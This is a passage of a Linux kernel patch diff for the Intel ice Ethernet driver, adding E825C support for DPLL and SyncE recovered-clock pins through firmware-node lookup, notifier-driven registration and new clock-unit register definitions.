DPLL_PIN_STATE_DISCONNECTED)) { NL_SET_ERR_MSG_FMT(extack, "pin:%u state:%u on parent:%u already set", - p->idx, state, parent->idx); + p->idx, state, + ice_dpll_pin_get_parent_num(p, parent_pin)); goto unlock; } - ret = ice_aq_set_phy_rec_clk_out(&pf->hw, hw_idx, enable, - &p->freq); + + ret = hw->mac_type == ICE_MAC_GENERIC_3K_E825 ? 
+ ice_dpll_synce_update_e825c(hw, enable, + pf->ptp.port.port_num, + (enum ice_synce_clk)hw_idx) : + ice_aq_set_phy_rec_clk_out(hw, hw_idx, enable, &p->freq); if (ret) NL_SET_ERR_MSG_FMT(extack, "err:%d %s failed to set pin state:%u for pin:%u on parent:%u", ret, - libie_aq_str(pf->hw.adminq.sq_last_status), - state, p->idx, parent->idx); + libie_aq_str(hw->adminq.sq_last_status), + state, p->idx, + ice_dpll_pin_get_parent_num(p, parent_pin)); unlock: mutex_unlock(&pf->dplls.lock); @@ -2344,17 +2488,17 @@ ice_dpll_rclk_state_on_pin_get(const struct dpll_pin *pin, void *pin_priv, enum dpll_pin_state *state, struct netlink_ext_ack *extack) { - struct ice_dpll_pin *p = pin_priv, *parent = parent_pin_priv; + struct ice_dpll_pin *p = pin_priv; struct ice_pf *pf = p->pf; int ret = -EINVAL; - u32 hw_idx; + int hw_idx; if (ice_dpll_is_reset(pf, extack)) return -EBUSY; mutex_lock(&pf->dplls.lock); - hw_idx = parent->idx - pf->dplls.base_rclk_idx; - if (hw_idx >= pf->dplls.num_inputs) + hw_idx = ice_dpll_pin_get_parent_idx(p, parent_pin); + if (hw_idx < 0) goto unlock; ret = ice_dpll_pin_state_update(pf, p, ICE_DPLL_PIN_TYPE_RCLK_INPUT, @@ -2814,7 +2958,8 @@ static void ice_dpll_release_pins(struct ice_dpll_pin *pins, int count) int i; for (i = 0; i < count; i++) - dpll_pin_put(pins[i].pin, &pins[i].tracker); + if (!IS_ERR_OR_NULL(pins[i].pin)) + dpll_pin_put(pins[i].pin, &pins[i].tracker); } /** @@ -2836,10 +2981,14 @@ static int ice_dpll_get_pins(struct ice_pf *pf, struct ice_dpll_pin *pins, int start_idx, int count, u64 clock_id) { + u32 pin_index; int i, ret; for (i = 0; i < count; i++) { - pins[i].pin = dpll_pin_get(clock_id, i + start_idx, THIS_MODULE, + pin_index = start_idx; + if (start_idx != DPLL_PIN_IDX_UNSPEC) + pin_index += i; + pins[i].pin = dpll_pin_get(clock_id, pin_index, THIS_MODULE, &pins[i].prop, &pins[i].tracker); if (IS_ERR(pins[i].pin)) { ret = PTR_ERR(pins[i].pin); @@ -2944,6 +3093,7 @@ ice_dpll_register_pins(struct dpll_device *dpll, struct 
ice_dpll_pin *pins, /** * ice_dpll_deinit_direct_pins - deinitialize direct pins + * @pf: board private structure * @cgu: if cgu is present and controlled by this NIC * @pins: pointer to pins array * @count: number of pins @@ -2955,7 +3105,8 @@ ice_dpll_register_pins(struct dpll_device *dpll, struct ice_dpll_pin *pins, * Release pins resources to the dpll subsystem. */ static void -ice_dpll_deinit_direct_pins(bool cgu, struct ice_dpll_pin *pins, int count, +ice_dpll_deinit_direct_pins(struct ice_pf *pf, bool cgu, + struct ice_dpll_pin *pins, int count, const struct dpll_pin_ops *ops, struct dpll_device *first, struct dpll_device *second) @@ -3024,14 +3175,14 @@ static void ice_dpll_deinit_rclk_pin(struct ice_pf *pf) { struct ice_dpll_pin *rclk = &pf->dplls.rclk; struct ice_vsi *vsi = ice_get_main_vsi(pf); - struct dpll_pin *parent; + struct ice_dpll_pin *parent; int i; for (i = 0; i < rclk->num_parents; i++) { - parent = pf->dplls.inputs[rclk->parent_idx[i]].pin; - if (!parent) + parent = &pf->dplls.inputs[rclk->parent_idx[i]]; + if (IS_ERR_OR_NULL(parent->pin)) continue; - dpll_pin_on_pin_unregister(parent, rclk->pin, + dpll_pin_on_pin_unregister(parent->pin, rclk->pin, &ice_dpll_rclk_ops, rclk); } if (WARN_ON_ONCE(!vsi || !vsi->netdev)) @@ -3040,60 +3191,213 @@ static void ice_dpll_deinit_rclk_pin(struct ice_pf *pf) dpll_pin_put(rclk->pin, &rclk->tracker); } +static bool ice_dpll_is_fwnode_pin(struct ice_dpll_pin *pin) +{ + return !IS_ERR_OR_NULL(pin->fwnode); +} + +static void ice_dpll_pin_notify_work(struct work_struct *work) +{ + struct ice_dpll_pin_work *w = container_of(work, + struct ice_dpll_pin_work, + work); + struct ice_dpll_pin *pin, *parent = w->pin; + struct ice_pf *pf = parent->pf; + int ret; + + wait_for_completion(&pf->dplls.dpll_init); + if (!test_bit(ICE_FLAG_DPLL, pf->flags)) + return; /* DPLL initialization failed */ + + switch (w->action) { + case DPLL_PIN_CREATED: + if (!IS_ERR_OR_NULL(parent->pin)) { + /* We have already our pin registered 
*/ + goto out; + } + + /* Grab reference on fwnode pin */ + parent->pin = fwnode_dpll_pin_find(parent->fwnode, + &parent->tracker); + if (IS_ERR_OR_NULL(parent->pin)) { + dev_err(ice_pf_to_dev(pf), + "Cannot get fwnode pin reference\n"); + goto out; + } + + /* Register rclk pin */ + pin = &pf->dplls.rclk; + ret = dpll_pin_on_pin_register(parent->pin, pin->pin, + &ice_dpll_rclk_ops, pin); + if (ret) { + dev_err(ice_pf_to_dev(pf), + "Failed to register pin: %pe\n", ERR_PTR(ret)); + dpll_pin_put(parent->pin, &parent->tracker); + parent->pin = NULL; + goto out; + } + break; + case DPLL_PIN_DELETED: + if (IS_ERR_OR_NULL(parent->pin)) { + /* We have already our pin unregistered */ + goto out; + } + + /* Unregister rclk pin */ + pin = &pf->dplls.rclk; + dpll_pin_on_pin_unregister(parent->pin, pin->pin, + &ice_dpll_rclk_ops, pin); + + /* Drop fwnode pin reference */ + dpll_pin_put(parent->pin, &parent->tracker); + parent->pin = NULL; + break; + default: + break; + } +out: + kfree(w); +} + +static int ice_dpll_pin_notify(struct notifier_block *nb, unsigned long action, + void *data) +{ + struct ice_dpll_pin *pin = container_of(nb, struct ice_dpll_pin, nb); + struct dpll_pin_notifier_info *info = data; + struct ice_dpll_pin_work *work; + + if (action != DPLL_PIN_CREATED && action != DPLL_PIN_DELETED) + return NOTIFY_DONE; + + /* Check if the reported pin is this one */ + if (pin->fwnode != info->fwnode) + return NOTIFY_DONE; /* Not this pin */ + + work = kzalloc(sizeof(*work), GFP_KERNEL); + if (!work) + return NOTIFY_DONE; + + INIT_WORK(&work->work, ice_dpll_pin_notify_work); + work->action = action; + work->pin = pin; + + queue_work(pin->pf->dplls.wq, &work->work); + + return NOTIFY_OK; +} + /** - * ice_dpll_init_rclk_pins - initialize recovered clock pin + * ice_dpll_init_pin_common - initialize pin * @pf: board private structure * @pin: pin to register * @start_idx: on which index shall allocation start in dpll subsystem * @ops: callback ops registered with the pins * - 
* Allocate resource for recovered clock pin in dpll subsystem. Register the - * pin with the parents it has in the info. Register pin with the pf's main vsi - * netdev. + * Allocate resource for given pin in dpll subsystem. Register the pin with + * the parents it has in the info. * * Return: * * 0 - success * * negative - registration failure reason */ static int -ice_dpll_init_rclk_pins(struct ice_pf *pf, struct ice_dpll_pin *pin, - int start_idx, const struct dpll_pin_ops *ops) +ice_dpll_init_pin_common(struct ice_pf *pf, struct ice_dpll_pin *pin, + int start_idx, const struct dpll_pin_ops *ops) { - struct ice_vsi *vsi = ice_get_main_vsi(pf); - struct dpll_pin *parent; + struct ice_dpll_pin *parent; int ret, i; - if (WARN_ON((!vsi || !vsi->netdev))) - return -EINVAL; - ret = ice_dpll_get_pins(pf, pin, start_idx, ICE_DPLL_RCLK_NUM_PER_PF, - pf->dplls.clock_id); + ret = ice_dpll_get_pins(pf, pin, start_idx, 1, pf->dplls.clock_id); if (ret) return ret; - for (i = 0; i < pf->dplls.rclk.num_parents; i++) { - parent = pf->dplls.inputs[pf->dplls.rclk.parent_idx[i]].pin; - if (!parent) { - ret = -ENODEV; - goto unregister_pins; + + for (i = 0; i < pin->num_parents; i++) { + parent = &pf->dplls.inputs[pin->parent_idx[i]]; + if (IS_ERR_OR_NULL(parent->pin)) { + if (!ice_dpll_is_fwnode_pin(parent)) { + ret = -ENODEV; + goto unregister_pins; + } + parent->pin = fwnode_dpll_pin_find(parent->fwnode, + &parent->tracker); + if (IS_ERR_OR_NULL(parent->pin)) { + dev_info(ice_pf_to_dev(pf), + "Mux pin not registered yet\n"); + continue; + } } - ret = dpll_pin_on_pin_register(parent, pf->dplls.rclk.pin, - ops, &pf->dplls.rclk); + ret = dpll_pin_on_pin_register(parent->pin, pin->pin, ops, pin); if (ret) goto unregister_pins; } - dpll_netdev_pin_set(vsi->netdev, pf->dplls.rclk.pin); return 0; unregister_pins: while (i) { - parent = pf->dplls.inputs[pf->dplls.rclk.parent_idx[--i]].pin; - dpll_pin_on_pin_unregister(parent, pf->dplls.rclk.pin, - &ice_dpll_rclk_ops, &pf->dplls.rclk); + 
parent = &pf->dplls.inputs[pin->parent_idx[--i]]; + if (IS_ERR_OR_NULL(parent->pin)) + continue; + dpll_pin_on_pin_unregister(parent->pin, pin->pin, ops, pin); } - ice_dpll_release_pins(pin, ICE_DPLL_RCLK_NUM_PER_PF); + ice_dpll_release_pins(pin, 1); + return ret; } +/** + * ice_dpll_init_rclk_pin - initialize recovered clock pin + * @pf: board private structure + * @start_idx: on which index shall allocation start in dpll subsystem + * @ops: callback ops registered with the pins + * + * Allocate resource for recovered clock pin in dpll subsystem. Register the + * pin with the parents it has in the info. + * + * Return: + * * 0 - success + * * negative - registration failure reason + */ +static int +ice_dpll_init_rclk_pin(struct ice_pf *pf, int start_idx, + const struct dpll_pin_ops *ops) +{ + struct ice_vsi *vsi = ice_get_main_vsi(pf); + int ret; + + ret = ice_dpll_init_pin_common(pf, &pf->dplls.rclk, start_idx, ops); + if (ret) + return ret; + + dpll_netdev_pin_set(vsi->netdev, pf->dplls.rclk.pin); + + return 0; +} + +static void +ice_dpll_deinit_fwnode_pin(struct ice_dpll_pin *pin) +{ + unregister_dpll_notifier(&pin->nb); + flush_workqueue(pin->pf->dplls.wq); + if (!IS_ERR_OR_NULL(pin->pin)) { + dpll_pin_put(pin->pin, &pin->tracker); + pin->pin = NULL; + } + fwnode_handle_put(pin->fwnode); + pin->fwnode = NULL; +} + +static void +ice_dpll_deinit_fwnode_pins(struct ice_pf *pf, struct ice_dpll_pin *pins, + int start_idx) +{ + int i; + + for (i = 0; i < pf->dplls.rclk.num_parents; i++) + ice_dpll_deinit_fwnode_pin(&pins[start_idx + i]); + destroy_workqueue(pf->dplls.wq); +} + /** * ice_dpll_deinit_pins - deinitialize direct pins * @pf: board private structure @@ -3113,6 +3417,8 @@ static void ice_dpll_deinit_pins(struct ice_pf *pf, bool cgu) struct ice_dpll *dp = &d->pps; ice_dpll_deinit_rclk_pin(pf); + if (pf->hw.mac_type == ICE_MAC_GENERIC_3K_E825) + ice_dpll_deinit_fwnode_pins(pf, pf->dplls.inputs, 0); if (cgu) { ice_dpll_unregister_pins(dp->dpll, inputs, 
&ice_dpll_input_ops, num_inputs); @@ -3127,12 +3433,12 @@ static void ice_dpll_deinit_pins(struct ice_pf *pf, bool cgu) &ice_dpll_output_ops, num_outputs); ice_dpll_release_pins(outputs, num_outputs); if (!pf->dplls.generic) { - ice_dpll_deinit_direct_pins(cgu, pf->dplls.ufl, + ice_dpll_deinit_direct_pins(pf, cgu, pf->dplls.ufl, ICE_DPLL_PIN_SW_NUM, &ice_dpll_pin_ufl_ops, pf->dplls.pps.dpll, pf->dplls.eec.dpll); - ice_dpll_deinit_direct_pins(cgu, pf->dplls.sma, + ice_dpll_deinit_direct_pins(pf, cgu, pf->dplls.sma, ICE_DPLL_PIN_SW_NUM, &ice_dpll_pin_sma_ops, pf->dplls.pps.dpll, @@ -3141,6 +3447,141 @@ static void ice_dpll_deinit_pins(struct ice_pf *pf, bool cgu) } } +static struct fwnode_handle * +ice_dpll_pin_node_get(struct ice_pf *pf, const char *name) +{ + struct fwnode_handle *fwnode = dev_fwnode(ice_pf_to_dev(pf)); + int index; + + index = fwnode_property_match_string(fwnode, "dpll-pin-names", name); + if (index < 0) + return ERR_PTR(-ENOENT); + + return fwnode_find_reference(fwnode, "dpll-pins", index); +} + +static int +ice_dpll_init_fwnode_pin(struct ice_dpll_pin *pin, const char *name) +{ + struct ice_pf *pf = pin->pf; + int ret; + + pin->fwnode = ice_dpll_pin_node_get(pf, name); + if (IS_ERR(pin->fwnode)) { + dev_err(ice_pf_to_dev(pf), + "Failed to find %s firmware node: %pe\n", name, + pin->fwnode); + pin->fwnode = NULL; + return -ENODEV; + } + + dev_dbg(ice_pf_to_dev(pf), "Found fwnode node for %s\n", name); + + pin->pin = fwnode_dpll_pin_find(pin->fwnode, &pin->tracker); + if (IS_ERR_OR_NULL(pin->pin)) { + dev_info(ice_pf_to_dev(pf), + "DPLL pin for %pfwp not registered yet\n", + pin->fwnode); + pin->pin = NULL; + } + + pin->nb.notifier_call = ice_dpll_pin_notify; + ret = register_dpll_notifier(&pin->nb); + if (ret) { + dev_err(ice_pf_to_dev(pf), + "Failed to subscribe for DPLL notifications\n"); + + if (!IS_ERR_OR_NULL(pin->pin)) { + dpll_pin_put(pin->pin, &pin->tracker); + pin->pin = NULL; + } + fwnode_handle_put(pin->fwnode); + pin->fwnode = NULL; + 
+ return ret; + } + + return ret; +} + +/** + * ice_dpll_init_fwnode_pins - initialize pins from firmware nodes + * @pf: board private structure + * @pins: pointer to pins array + * @start_idx: starting index for pins + * + * Initialize input pins for E825 RCLK support. The parent pins (rclk0, rclk1) + * are expected to be defined by the system firmware (ACPI). This function + * allocates them in the dpll subsystem and stores their indices for later + * registration with the rclk pin. + * + * Return: + * * 0 - success + * * negative - initialization failure reason + */ +static int +ice_dpll_init_fwnode_pins(struct ice_pf *pf, struct ice_dpll_pin *pins, + int start_idx) +{ + char pin_name[8]; + int i, ret; + + pf->dplls.wq = create_singlethread_workqueue("ice_dpll_wq"); + if (!pf->dplls.wq) + return -ENOMEM; + + for (i = 0; i < pf->dplls.rclk.num_parents; i++) { + pins[start_idx + i].pf = pf; + snprintf(pin_name, sizeof(pin_name), "rclk%u", i); + ret = ice_dpll_init_fwnode_pin(&pins[start_idx + i], pin_name); + if (ret) + goto error; + } + + return 0; +error: + while (i--) + ice_dpll_deinit_fwnode_pin(&pins[start_idx + i]); + + destroy_workqueue(pf->dplls.wq); + + return ret; +} + +/** + * ice_dpll_init_pins_e825 - init pins and register pins with dplls + * @pf: board private structure + * + * Initialize pf's pins within pf's dplls in a Linux dpll + * subsystem. + * + * Return: + * * 0 - success + * * negative - initialization failure reason + */ +static int ice_dpll_init_pins_e825(struct ice_pf *pf) +{ + int ret; + + ret = ice_dpll_init_fwnode_pins(pf, pf->dplls.inputs, 0); + if (ret) + return ret; + + ret = ice_dpll_init_rclk_pin(pf, DPLL_PIN_IDX_UNSPEC, + &ice_dpll_rclk_ops); + if (ret) { + /* Inform DPLL notifier works that DPLL init was finished + * unsuccessfully (ICE_FLAG_DPLL not set).
+ */ + complete_all(&pf->dplls.dpll_init); + ice_dpll_deinit_fwnode_pins(pf, pf->dplls.inputs, 0); + } + + return ret; +} + /** * ice_dpll_init_pins - init pins and register pins with a dplls * @pf: board private structure @@ -3155,21 +3596,24 @@ static void ice_dpll_deinit_pins(struct ice_pf *pf, bool cgu) */ static int ice_dpll_init_pins(struct ice_pf *pf, bool cgu) { + const struct dpll_pin_ops *output_ops; + const struct dpll_pin_ops *input_ops; int ret, count; + input_ops = &ice_dpll_input_ops; + output_ops = &ice_dpll_output_ops; + ret = ice_dpll_init_direct_pins(pf, cgu, pf->dplls.inputs, 0, - pf->dplls.num_inputs, - &ice_dpll_input_ops, - pf->dplls.eec.dpll, pf->dplls.pps.dpll); + pf->dplls.num_inputs, input_ops, + pf->dplls.eec.dpll, + pf->dplls.pps.dpll); if (ret) return ret; count = pf->dplls.num_inputs; if (cgu) { ret = ice_dpll_init_direct_pins(pf, cgu, pf->dplls.outputs, - count, - pf->dplls.num_outputs, - &ice_dpll_output_ops, - pf->dplls.eec.dpll, + count, pf->dplls.num_outputs, + output_ops, pf->dplls.eec.dpll, pf->dplls.pps.dpll); if (ret) goto deinit_inputs; @@ -3205,30 +3649,30 @@ static int ice_dpll_init_pins(struct ice_pf *pf, bool cgu) } else { count += pf->dplls.num_outputs + 2 * ICE_DPLL_PIN_SW_NUM; } - ret = ice_dpll_init_rclk_pins(pf, &pf->dplls.rclk, count + pf->hw.pf_id, - &ice_dpll_rclk_ops); + + ret = ice_dpll_init_rclk_pin(pf, count + pf->ptp.port.port_num, + &ice_dpll_rclk_ops); if (ret) goto deinit_ufl; return 0; deinit_ufl: - ice_dpll_deinit_direct_pins(cgu, pf->dplls.ufl, - ICE_DPLL_PIN_SW_NUM, - &ice_dpll_pin_ufl_ops, - pf->dplls.pps.dpll, pf->dplls.eec.dpll); + ice_dpll_deinit_direct_pins(pf, cgu, pf->dplls.ufl, ICE_DPLL_PIN_SW_NUM, + &ice_dpll_pin_ufl_ops, pf->dplls.pps.dpll, + pf->dplls.eec.dpll); deinit_sma: - ice_dpll_deinit_direct_pins(cgu, pf->dplls.sma, - ICE_DPLL_PIN_SW_NUM, - &ice_dpll_pin_sma_ops, - pf->dplls.pps.dpll, pf->dplls.eec.dpll); + ice_dpll_deinit_direct_pins(pf, cgu, pf->dplls.sma, ICE_DPLL_PIN_SW_NUM, + 
&ice_dpll_pin_sma_ops, pf->dplls.pps.dpll, + pf->dplls.eec.dpll); deinit_outputs: - ice_dpll_deinit_direct_pins(cgu, pf->dplls.outputs, + ice_dpll_deinit_direct_pins(pf, cgu, pf->dplls.outputs, pf->dplls.num_outputs, - &ice_dpll_output_ops, pf->dplls.pps.dpll, + output_ops, pf->dplls.pps.dpll, pf->dplls.eec.dpll); deinit_inputs: - ice_dpll_deinit_direct_pins(cgu, pf->dplls.inputs, pf->dplls.num_inputs, - &ice_dpll_input_ops, pf->dplls.pps.dpll, + ice_dpll_deinit_direct_pins(pf, cgu, pf->dplls.inputs, + pf->dplls.num_inputs, + input_ops, pf->dplls.pps.dpll, pf->dplls.eec.dpll); return ret; } @@ -3239,8 +3683,8 @@ static int ice_dpll_init_pins(struct ice_pf *pf, bool cgu) * @d: pointer to ice_dpll * @cgu: if cgu is present and controlled by this NIC * - * If cgu is owned unregister the dpll from dpll subsystem. - * Release resources of dpll device from dpll subsystem. + * If cgu is owned, unregister the DPLL from DPLL subsystem. + * Release resources of DPLL device from DPLL subsystem. */ static void ice_dpll_deinit_dpll(struct ice_pf *pf, struct ice_dpll *d, bool cgu) @@ -3257,8 +3701,8 @@ ice_dpll_deinit_dpll(struct ice_pf *pf, struct ice_dpll *d, bool cgu) * @cgu: if cgu is present and controlled by this NIC * @type: type of dpll being initialized * - * Allocate dpll instance for this board in dpll subsystem, if cgu is controlled - * by this NIC, register dpll with the callback ops. + * Allocate DPLL instance for this board in dpll subsystem, if cgu is controlled + * by this NIC, register DPLL with the callback ops.
* * Return: * * 0 - success @@ -3289,6 +3733,7 @@ ice_dpll_init_dpll(struct ice_pf *pf, struct ice_dpll *d, bool cgu, ret = dpll_device_register(d->dpll, type, ops, d); if (ret) { dpll_device_put(d->dpll, &d->tracker); + d->dpll = NULL; return ret; } d->ops = ops; @@ -3506,6 +3951,26 @@ ice_dpll_init_info_direct_pins(struct ice_pf *pf, return ret; } +/** + * ice_dpll_init_info_pin_on_pin_e825c - initializes rclk pin information + * @pf: board private structure + * + * Init information for rclk pin, cache them in pf->dplls.rclk. + * + * Return: + * * 0 - success + */ +static int ice_dpll_init_info_pin_on_pin_e825c(struct ice_pf *pf) +{ + struct ice_dpll_pin *rclk_pin = &pf->dplls.rclk; + + rclk_pin->prop.type = DPLL_PIN_TYPE_SYNCE_ETH_PORT; + rclk_pin->prop.capabilities |= DPLL_PIN_CAPABILITIES_STATE_CAN_CHANGE; + rclk_pin->pf = pf; + + return 0; +} + /** * ice_dpll_init_info_rclk_pin - initializes rclk pin information * @pf: board private structure @@ -3632,7 +4097,10 @@ ice_dpll_init_pins_info(struct ice_pf *pf, enum ice_dpll_pin_type pin_type) case ICE_DPLL_PIN_TYPE_OUTPUT: return ice_dpll_init_info_direct_pins(pf, pin_type); case ICE_DPLL_PIN_TYPE_RCLK_INPUT: - return ice_dpll_init_info_rclk_pin(pf); + if (pf->hw.mac_type == ICE_MAC_GENERIC_3K_E825) + return ice_dpll_init_info_pin_on_pin_e825c(pf); + else + return ice_dpll_init_info_rclk_pin(pf); case ICE_DPLL_PIN_TYPE_SOFTWARE: return ice_dpll_init_info_sw_pins(pf); default: @@ -3654,6 +4122,50 @@ static void ice_dpll_deinit_info(struct ice_pf *pf) kfree(pf->dplls.pps.input_prio); } +/** + * ice_dpll_init_info_e825c - prepare pf's dpll information structure for e825c + * device + * @pf: board private structure + * + * Acquire (from HW) and set basic DPLL information (on pf->dplls struct). 
+ * + * Return: + * * 0 - success + * * negative - init failure reason + */ +static int ice_dpll_init_info_e825c(struct ice_pf *pf) +{ + struct ice_dplls *d = &pf->dplls; + int ret = 0; + int i; + + d->clock_id = ice_generate_clock_id(pf); + d->num_inputs = ICE_SYNCE_CLK_NUM; + + d->inputs = kcalloc(d->num_inputs, sizeof(*d->inputs), GFP_KERNEL); + if (!d->inputs) + return -ENOMEM; + + ret = ice_get_cgu_rclk_pin_info(&pf->hw, &d->base_rclk_idx, + &pf->dplls.rclk.num_parents); + if (ret) + goto deinit_info; + + for (i = 0; i < pf->dplls.rclk.num_parents; i++) + pf->dplls.rclk.parent_idx[i] = d->base_rclk_idx + i; + + ret = ice_dpll_init_pins_info(pf, ICE_DPLL_PIN_TYPE_RCLK_INPUT); + if (ret) + goto deinit_info; + dev_dbg(ice_pf_to_dev(pf), + "%s - success, inputs: %u, outputs: %u, rclk-parents: %u\n", + __func__, d->num_inputs, d->num_outputs, d->rclk.num_parents); + return 0; +deinit_info: + ice_dpll_deinit_info(pf); + return ret; +} + /** * ice_dpll_init_info - prepare pf's dpll information structure * @pf: board private structure @@ -3773,14 +4285,16 @@ void ice_dpll_deinit(struct ice_pf *pf) ice_dpll_deinit_worker(pf); ice_dpll_deinit_pins(pf, cgu); - ice_dpll_deinit_dpll(pf, &pf->dplls.pps, cgu); - ice_dpll_deinit_dpll(pf, &pf->dplls.eec, cgu); + if (!IS_ERR_OR_NULL(pf->dplls.pps.dpll)) + ice_dpll_deinit_dpll(pf, &pf->dplls.pps, cgu); + if (!IS_ERR_OR_NULL(pf->dplls.eec.dpll)) + ice_dpll_deinit_dpll(pf, &pf->dplls.eec, cgu); ice_dpll_deinit_info(pf); mutex_destroy(&pf->dplls.lock); } /** - * ice_dpll_init - initialize support for dpll subsystem + * ice_dpll_init_e825 - initialize support for dpll subsystem * @pf: board private structure * * Set up the device dplls, register them and pins connected within Linux dpll @@ -3789,7 +4303,43 @@ void ice_dpll_deinit(struct ice_pf *pf) * * Context: Initializes pf->dplls.lock mutex. 
*/ -void ice_dpll_init(struct ice_pf *pf) +static void ice_dpll_init_e825(struct ice_pf *pf) +{ + struct ice_dplls *d = &pf->dplls; + int err; + + mutex_init(&d->lock); + init_completion(&d->dpll_init); + + err = ice_dpll_init_info_e825c(pf); + if (err) + goto err_exit; + err = ice_dpll_init_pins_e825(pf); + if (err) + goto deinit_info; + set_bit(ICE_FLAG_DPLL, pf->flags); + complete_all(&d->dpll_init); + + return; + +deinit_info: + ice_dpll_deinit_info(pf); +err_exit: + mutex_destroy(&d->lock); + dev_warn(ice_pf_to_dev(pf), "DPLLs init failure err:%d\n", err); +} + +/** + * ice_dpll_init_e810 - initialize support for dpll subsystem + * @pf: board private structure + * + * Set up the device dplls, register them and pins connected within Linux dpll + * subsystem. Allow userspace to obtain state of DPLL and handling of DPLL + * configuration requests. + * + * Context: Initializes pf->dplls.lock mutex. + */ +static void ice_dpll_init_e810(struct ice_pf *pf) { bool cgu = ice_is_feature_supported(pf, ICE_F_CGU); struct ice_dplls *d = &pf->dplls; @@ -3829,3 +4379,15 @@ void ice_dpll_init(struct ice_pf *pf) mutex_destroy(&d->lock); dev_warn(ice_pf_to_dev(pf), "DPLLs init failure err:%d\n", err); } + +void ice_dpll_init(struct ice_pf *pf) +{ + switch (pf->hw.mac_type) { + case ICE_MAC_GENERIC_3K_E825: + ice_dpll_init_e825(pf); + break; + default: + ice_dpll_init_e810(pf); + break; + } +} diff --git a/drivers/net/ethernet/intel/ice/ice_dpll.h b/drivers/net/ethernet/intel/ice/ice_dpll.h index 63fac6510df6e..ae42cdea0ee14 100644 --- a/drivers/net/ethernet/intel/ice/ice_dpll.h +++ b/drivers/net/ethernet/intel/ice/ice_dpll.h @@ -20,6 +20,12 @@ enum ice_dpll_pin_sw { ICE_DPLL_PIN_SW_NUM }; +struct ice_dpll_pin_work { + struct work_struct work; + unsigned long action; + struct ice_dpll_pin *pin; +}; + /** ice_dpll_pin - store info about pins * @pin: dpll pin structure * @pf: pointer to pf, which has registered the dpll_pin @@ -39,6 +45,8 @@ struct ice_dpll_pin { struct dpll_pin 
*pin; struct ice_pf *pf; dpll_tracker tracker; + struct fwnode_handle *fwnode; + struct notifier_block nb; u8 idx; u8 num_parents; u8 parent_idx[ICE_DPLL_RCLK_NUM_MAX]; @@ -118,7 +126,9 @@ struct ice_dpll { struct ice_dplls { struct kthread_worker *kworker; struct kthread_delayed_work work; + struct workqueue_struct *wq; struct mutex lock; + struct completion dpll_init; struct ice_dpll eec; struct ice_dpll pps; struct ice_dpll_pin *inputs; @@ -147,3 +157,19 @@ static inline void ice_dpll_deinit(struct ice_pf *pf) { } #endif #endif + +#define ICE_CGU_R10 0x28 +#define ICE_CGU_R10_SYNCE_CLKO_SEL GENMASK(8, 5) +#define ICE_CGU_R10_SYNCE_CLKODIV_M1 GENMASK(13, 9) +#define ICE_CGU_R10_SYNCE_CLKODIV_LOAD BIT(14) +#define ICE_CGU_R10_SYNCE_DCK_RST BIT(15) +#define ICE_CGU_R10_SYNCE_ETHCLKO_SEL GENMASK(18, 16) +#define ICE_CGU_R10_SYNCE_ETHDIV_M1 GENMASK(23, 19) +#define ICE_CGU_R10_SYNCE_ETHDIV_LOAD BIT(24) +#define ICE_CGU_R10_SYNCE_DCK2_RST BIT(25) +#define ICE_CGU_R10_SYNCE_S_REF_CLK GENMASK(31, 27) + +#define ICE_CGU_R11 0x2C +#define ICE_CGU_R11_SYNCE_S_BYP_CLK GENMASK(6, 1) + +#define ICE_CGU_BYPASS_MUX_OFFSET_E825C 3 diff --git a/drivers/net/ethernet/intel/ice/ice_lib.c b/drivers/net/ethernet/intel/ice/ice_lib.c index 2522ebdea9139..d921269e1fe71 100644 --- a/drivers/net/ethernet/intel/ice/ice_lib.c +++ b/drivers/net/ethernet/intel/ice/ice_lib.c @@ -3989,6 +3989,9 @@ void ice_init_feature_support(struct ice_pf *pf) break; } + if (pf->hw.mac_type == ICE_MAC_GENERIC_3K_E825) + ice_set_feature_support(pf, ICE_F_PHY_RCLK); + if (pf->hw.mac_type == ICE_MAC_E830) { ice_set_feature_support(pf, ICE_F_MBX_LIMIT); ice_set_feature_support(pf, ICE_F_GCS); diff --git a/drivers/net/ethernet/intel/ice/ice_ptp.c b/drivers/net/ethernet/intel/ice/ice_ptp.c index 4c8d20f2d2c0a..1d26be58e29a0 100644 --- a/drivers/net/ethernet/intel/ice/ice_ptp.c +++ b/drivers/net/ethernet/intel/ice/ice_ptp.c @@ -1341,6 +1341,38 @@ void ice_ptp_link_change(struct ice_pf *pf, bool linkup) if 
(pf->hw.reset_ongoing) return; + if (hw->mac_type == ICE_MAC_GENERIC_3K_E825) { + int pin, err; + + if (!test_bit(ICE_FLAG_DPLL, pf->flags)) + return; + + mutex_lock(&pf->dplls.lock); + for (pin = 0; pin < ICE_SYNCE_CLK_NUM; pin++) { + enum ice_synce_clk clk_pin; + bool active; + u8 port_num; + + port_num = ptp_port->port_num; + clk_pin = (enum ice_synce_clk)pin; + err = ice_tspll_bypass_mux_active_e825c(hw, + port_num, + &active, + clk_pin); + if (WARN_ON_ONCE(err)) { + mutex_unlock(&pf->dplls.lock); + return; + } + + err = ice_tspll_cfg_synce_ethdiv_e825c(hw, clk_pin); + if (active && WARN_ON_ONCE(err)) { + mutex_unlock(&pf->dplls.lock); + return; + } + } + mutex_unlock(&pf->dplls.lock); + } + switch (hw->mac_type) { case ICE_MAC_E810: case ICE_MAC_E830: diff --git a/drivers/net/ethernet/intel/ice/ice_ptp_hw.c b/drivers/net/ethernet/intel/ice/ice_ptp_hw.c index 35680dbe4a7f7..61c0a0d93ea89 100644 --- a/drivers/net/ethernet/intel/ice/ice_ptp_hw.c +++ b/drivers/net/ethernet/intel/ice/ice_ptp_hw.c @@ -5903,7 +5903,14 @@ int ice_get_cgu_rclk_pin_info(struct ice_hw *hw, u8 *base_idx, u8 *pin_num) *base_idx = SI_REF1P; else ret = -ENODEV; - + break; + case ICE_DEV_ID_E825C_BACKPLANE: + case ICE_DEV_ID_E825C_QSFP: + case ICE_DEV_ID_E825C_SFP: + case ICE_DEV_ID_E825C_SGMII: + *pin_num = ICE_SYNCE_CLK_NUM; + *base_idx = 0; + ret = 0; break; default: ret = -ENODEV; diff --git a/drivers/net/ethernet/intel/ice/ice_tspll.c b/drivers/net/ethernet/intel/ice/ice_tspll.c index 66320a4ab86fd..fd4b58eb9bc00 100644 --- a/drivers/net/ethernet/intel/ice/ice_tspll.c +++ b/drivers/net/ethernet/intel/ice/ice_tspll.c @@ -624,3 +624,220 @@ int ice_tspll_init(struct ice_hw *hw) return err; } + +/** + * ice_tspll_bypass_mux_active_e825c - check if the given port is set active + * @hw: Pointer to the HW struct + * @port: Number of the port + * @active: Output flag showing if port is active + * @output: Output pin, we have two in E825C + * + * Check if given port is selected as 